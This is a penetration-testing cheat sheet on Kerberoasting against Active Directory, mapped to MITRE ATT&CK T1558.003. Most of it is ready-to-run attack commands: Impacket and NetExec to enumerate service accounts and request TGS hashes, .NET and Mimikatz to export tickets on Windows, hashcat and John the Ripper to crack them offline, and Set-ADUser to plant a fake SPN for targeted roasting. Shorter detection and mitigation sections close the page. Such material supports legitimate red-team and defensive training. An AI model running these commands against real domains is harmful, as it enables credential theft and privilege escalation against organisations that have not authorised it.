Kerberoasting

Overview

Kerberoasting extracts service ticket hashes (TGS) for accounts with Service Principal Names (SPNs) and cracks them offline. Any domain user can request a service ticket for any SPN — the ticket is encrypted with the service account's password hash. If the service account has a weak password, the hash can be cracked to reveal plaintext credentials. High-value targets are service accounts with admin privileges.

ATT&CK Mapping

• Tactic: TA0006 - Credential Access
• Technique: T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting

Prerequisites

• Valid domain credentials (any domain user)
• Network access to a Domain Controller (port 88 Kerberos)

Techniques

Enumerate Kerberoastable Accounts

# Impacket
# https://github.com/fortra/impacket
impacket-GetUserSPNs '<domain>/<user>:<password>' -dc-ip <dc_ip>

# With NTLM hash (pass-the-hash)
impacket-GetUserSPNs '<domain>/<user>' -hashes ':<ntlm_hash>' -dc-ip <dc_ip>

# NetExec
# https://github.com/Pennyw0rth/NetExec
nxc ldap <dc_ip> -u <user> -p <password> --kerberoasting output.txt

Request and Extract Hashes

# Impacket — request TGS hashes for all kerberoastable accounts
# https://github.com/fortra/impacket
impacket-GetUserSPNs '<domain>/<user>:<password>' -dc-ip <dc_ip> -request

# Save hashes to file
impacket-GetUserSPNs '<domain>/<user>:<password>' -dc-ip <dc_ip> -request -outputfile kerberoast.txt

# Target a specific SPN
impacket-GetUserSPNs '<domain>/<user>:<password>' -dc-ip <dc_ip> -request-user <target_user>

From Windows:

# Request TGS tickets using .NET
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/db.domain.local:1433"

# Export tickets from memory with Mimikatz
# Mimikatz
# https://github.com/gentilkiwi/mimikatz
mimikatz# kerberos::list /export

Crack Kerberoast Hashes

# Hashcat
# https://github.com/hashcat/hashcat

# Kerberoast TGS-REP (RC4 / etype 23) — mode 13100
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt

# Kerberoast TGS-REP (AES256 / etype 18) — mode 19700
hashcat -m 19700 kerberoast.txt /usr/share/wordlists/rockyou.txt

# With rules
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best66.rule

# John the Ripper
# https://github.com/openwall/john
john kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt

Targeted Kerberoasting

If you have write access to an account's servicePrincipalName attribute, you can set an SPN on a high-value account and then Kerberoast it:

# Set SPN on a target account (requires write access to the SPN attribute)
# PowerShell
Set-ADUser -Identity <target_user> -ServicePrincipalNames @{Add='fake/spn'}

# Then Kerberoast the target
# Impacket
# https://github.com/fortra/impacket
impacket-GetUserSPNs '<domain>/<user>:<password>' -dc-ip <dc_ip> -request-user <target_user>

Detection Methods

Network-Based Detection

• Spike in TGS-REQ requests from a single source for multiple SPNs
• TGS requests for services the requesting user doesn't normally access

Host-Based Detection

• Windows Security Event 4769 (Kerberos Service Ticket Operations) — look for RC4 encryption type (0x17) which is weaker and commonly requested during Kerberoasting
• High volume of 4769 events from a single user in a short time period

Mitigation Strategies

• Strong service account passwords — use 25+ character random passwords for service accounts
• Managed Service Accounts (gMSA) — automatically rotated 256-character random passwords that cannot be Kerberoasted practically
• AES encryption — disable RC4 and enforce AES for Kerberos tickets (harder to crack)
• Monitor Kerberos traffic — alert on unusual TGS request patterns

References

Official Documentation

• Impacket

MITRE ATT&CK

• T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting